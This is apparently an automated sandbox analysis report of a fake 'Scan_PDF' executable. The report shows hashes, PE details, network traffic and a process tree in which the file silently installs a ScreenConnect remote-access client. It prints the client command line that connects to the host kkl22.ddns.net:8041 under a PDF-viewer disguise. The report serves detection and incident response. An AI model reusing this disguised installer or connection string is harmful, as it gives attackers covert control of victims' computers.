                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                          Malicious:false
                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                          Category:dropped
                                                                                          Size (bytes):32768
                                                                                          Entropy (8bit):1.4331821567465148
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:wafu2M+xFX4jT5hUpg4ndcqcq56AdujSiXdLDzV4xMygcuNoXSsYllwggr2Aduj8:jf5ATXegKppifXdfqHgcNMf8
                                                                                          MD5:C8F01A95CC3B981696E1F3322B48FF55
                                                                                          SHA1:789675F6483F32ECA08C0FC7CE4B0699A69BD68D
                                                                                          SHA-256:549CBE17FADF5C31AB161BCCE971AFB29B9BC5319C96626CDF51D09D1D10C810
                                                                                          SHA-512:6440BCC7B98ED4E0C502EF9E9A373D83B3652806A0D4DF680B0C20FD9273581967119660C6504AAAB21B81699F51BDE2A0E0E3CC87963457F05EFF3FEC8A159D
                                                                                          Malicious:false
                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):512
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                          Malicious:false
                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                          Category:dropped
                                                                                          Size (bytes):32768
                                                                                          Entropy (8bit):1.4331821567465148
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:wafu2M+xFX4jT5hUpg4ndcqcq56AdujSiXdLDzV4xMygcuNoXSsYllwggr2Aduj8:jf5ATXegKppifXdfqHgcNMf8
                                                                                          MD5:C8F01A95CC3B981696E1F3322B48FF55
                                                                                          SHA1:789675F6483F32ECA08C0FC7CE4B0699A69BD68D
                                                                                          SHA-256:549CBE17FADF5C31AB161BCCE971AFB29B9BC5319C96626CDF51D09D1D10C810
                                                                                          SHA-512:6440BCC7B98ED4E0C502EF9E9A373D83B3652806A0D4DF680B0C20FD9273581967119660C6504AAAB21B81699F51BDE2A0E0E3CC87963457F05EFF3FEC8A159D
                                                                                          Malicious:false
                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):512
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                          Malicious:false
                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):69632
                                                                                          Entropy (8bit):0.24122448207903388
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:9v1DBAdujS3qcq56AdujSiXdLDzV4xMygcuNoXSsYllwggr6i4n:9PxpifXdfqHgcNM7i
                                                                                          MD5:86E26E451709AA758597A50F4EC7BD93
                                                                                          SHA1:EE4EEE642B59C89DE4454A936240F99CD752B4FC
                                                                                          SHA-256:BCC56192AC95D6DAB07D9D113C9F07DB3840981972F46951FA827D53A9E347F3
                                                                                          SHA-512:20D570B3ACC855558F8E6B9BFB20356B016A1CB0CFC7D9EA70FF789EC2584B21C6DD6901CBDC30F9A25E6EF6A717E167466091A56F75575C90F57CAC320284F9
                                                                                          Malicious:false
                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):1.8171529868471552
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:98PhHuRc06WX4MnT5s4ndcqcq56AdujSiXdLDzV4xMygcuNoXSsYllwggr2Aduj8:ghH18nT6KppifXdfqHgcNMf8
                                                                                          MD5:B962409FB1C3CD3E8CC60CCBF069657E
                                                                                          SHA1:680185ABE8EE9B73B0E8F1D56E6449DECBA4443D
                                                                                          SHA-256:2665EE8ABC96EFA359448BD3B14A2830B9AD5500EABBBB775F826DC5E8D91DCF
                                                                                          SHA-512:1EC1BD20B196C7B855FFF4E6357850BAA6C2F2EB1B6A1F92DAEA0ECE5DEF6616B4F76B6789D90608E5B49657A9B468D08F4458C4FE2252DA5735F480C2C82E66
                                                                                          Malicious:false
                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):512
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                          Malicious:false
                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.433902060997362
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:Scan_PDF_2017163298.exe
                                                                                          File size:5'685'048 bytes
                                                                                          MD5:1204478277c15197fbdae6cc49c8f786
                                                                                          SHA1:da4038fb3569094afacf6edabab8f61323a5cccc
                                                                                          SHA256:fd0198e078b123e91bf968c6457666b8d9f9b5e69eae273665994d1a4595b6aa
                                                                                          SHA512:799ab384e7276291d8fdbc807695793a75be5be6377582aa1ef383a767d2798accae87963300acb2b29b07bdd5710ba3c1bbdbe76d5414aaeec4490a36007681
                                                                                          SSDEEP:49152:jDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoO:R4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                          TLSH:CA46F111B3D995B9D0BF063CD87A52699A74BC048722C7AF57D4B92D2D32BC04E323B6
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                          Icon Hash:00928e8e8686b000
                                                                                          Entrypoint:0x4014ad
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:true
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                          Signature Valid:true
                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                          Signature Validation Error:The operation completed successfully
                                                                                          Error Number:0
                                                                                          Not Before, Not After
                                                                                          • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                          Subject Chain
                                                                                          • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                          Version:3
                                                                                          Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                          Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                          Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                          Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                          Instruction
                                                                                          call 00007F25A0CF502Ah
                                                                                          jmp 00007F25A0CF4ADFh
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push 00000000h
                                                                                          call dword ptr [0040D040h]
                                                                                          push dword ptr [ebp+08h]
                                                                                          call dword ptr [0040D03Ch]
                                                                                          push C0000409h
                                                                                          call dword ptr [0040D044h]
                                                                                          push eax
                                                                                          call dword ptr [0040D048h]
                                                                                          pop ebp
                                                                                          ret
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 00000324h
                                                                                          push 00000017h
                                                                                          call dword ptr [0040D04Ch]
                                                                                          test eax, eax
                                                                                          je 00007F25A0CF4C67h
                                                                                          push 00000002h
                                                                                          pop ecx
                                                                                          int 29h
                                                                                          mov dword ptr [004148D8h], eax
                                                                                          mov dword ptr [004148D4h], ecx
                                                                                          mov dword ptr [004148D0h], edx
                                                                                          mov dword ptr [004148CCh], ebx
                                                                                          mov dword ptr [004148C8h], esi
                                                                                          mov dword ptr [004148C4h], edi
                                                                                          mov word ptr [004148F0h], ss
                                                                                          mov word ptr [004148E4h], cs
                                                                                          mov word ptr [004148C0h], ds
                                                                                          mov word ptr [004148BCh], es
                                                                                          mov word ptr [004148B8h], fs
                                                                                          mov word ptr [004148B4h], gs
                                                                                          pushfd
                                                                                          pop dword ptr [004148E8h]
                                                                                          mov eax, dword ptr [ebp+00h]
                                                                                          mov dword ptr [004148DCh], eax
                                                                                          mov eax, dword ptr [ebp+04h]
                                                                                          mov dword ptr [004148E0h], eax
                                                                                          lea eax, dword ptr [ebp+08h]
                                                                                          mov dword ptr [004148ECh], eax
                                                                                          mov eax, dword ptr [ebp-00000324h]
                                                                                          mov dword ptr [00414828h], 00010001h
                                                                                          Programming Language:
                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                          • [IMP] VS2008 build 21022
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x25d38
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                                                          FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                                                          FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                                                          FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                                                          FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                          RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                          DLLImport
                                                                                          mscoree.dllCorBindToRuntimeEx
                                                                                          KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                          OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 2, 2024 06:12:04.236079931 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:12:04.243165970 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:04.243247032 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:12:04.892769098 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:12:04.897641897 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:05.069989920 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:05.190854073 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:12:05.195791960 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:05.391413927 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:05.478007078 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:05.479031086 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:12:07.355488062 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:12:07.355542898 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:12:07.360517025 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:07.360532999 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:07.360543966 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:07.360613108 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:07.360622883 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:12:07.360717058 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:13:07.373253107 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:13:07.378117085 CEST804149707188.119.113.59192.168.2.9
                                                                                          Oct 2, 2024 06:14:07.389008999 CEST497078041192.168.2.9188.119.113.59
                                                                                          Oct 2, 2024 06:14:07.394985914 CEST804149707188.119.113.59192.168.2.9
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 2, 2024 06:12:04.167164087 CEST5389653192.168.2.91.1.1.1
                                                                                          Oct 2, 2024 06:12:04.175652027 CEST53538961.1.1.1192.168.2.9
                                                                                          Oct 2, 2024 06:12:16.942446947 CEST53605701.1.1.1192.168.2.9
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Oct 2, 2024 06:12:04.167164087 CEST192.168.2.91.1.1.10x1d36Standard query (0)kkl22.ddns.netA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Oct 2, 2024 06:12:04.175652027 CEST1.1.1.1192.168.2.90x1d36No error (0)kkl22.ddns.net188.119.113.59A (IP address)IN (0x0001)false

                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:00:11:56
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Users\user\Desktop\Scan_PDF_2017163298.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Scan_PDF_2017163298.exe"
                                                                                          Imagebase:0x330000
                                                                                          File size:5'685'048 bytes
                                                                                          MD5 hash:1204478277C15197FBDAE6CC49C8F786
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1365528966.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1346358493.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:00:11:57
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                                                                                          Imagebase:0xcc0000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:00:11:57
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                          Imagebase:0x7ff76edc0000
                                                                                          File size:69'632 bytes
                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:4
                                                                                          Start time:00:11:58
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F709E0C1738E8A53DFEDA48789872001 C
                                                                                          Imagebase:0xcc0000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:00:11:59
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9390.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5280796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                          Imagebase:0x290000
                                                                                          File size:61'440 bytes
                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:00:12:00
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 44B43403CFD66C9CC500A14417CF0426
                                                                                          Imagebase:0xcc0000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:00:12:01
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E44ABF9CE7CBB19DDF57A0D6AD3151E3 E Global\MSI0000
                                                                                          Imagebase:0xcc0000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:00:12:01
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
                                                                                          Imagebase:0x9c0000
                                                                                          File size:95'520 bytes
                                                                                          MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          • Detection: 3%, Virustotal, Browse
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:9
                                                                                          Start time:00:12:03
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "600c2429-3619-41f2-bc1a-bc0ec60c72d7" "User"
                                                                                          Imagebase:0x1a0000
                                                                                          File size:601'376 bytes
                                                                                          MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2588106191.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:10
                                                                                          Start time:00:12:05
                                                                                          Start date:02/10/2024
                                                                                          Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "be73d786-925b-47a5-99df-a44cdbf0e1aa" "System"
                                                                                          Imagebase:0x8a0000
                                                                                          File size:601'376 bytes
                                                                                          MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
